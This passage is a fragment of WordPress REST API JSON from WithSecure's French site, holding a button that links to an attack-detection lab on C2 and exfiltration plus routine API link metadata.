class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/lab_item\/10541","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/media?parent=10541"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/categories?post=10541"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/labs_content_type?post=10541"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}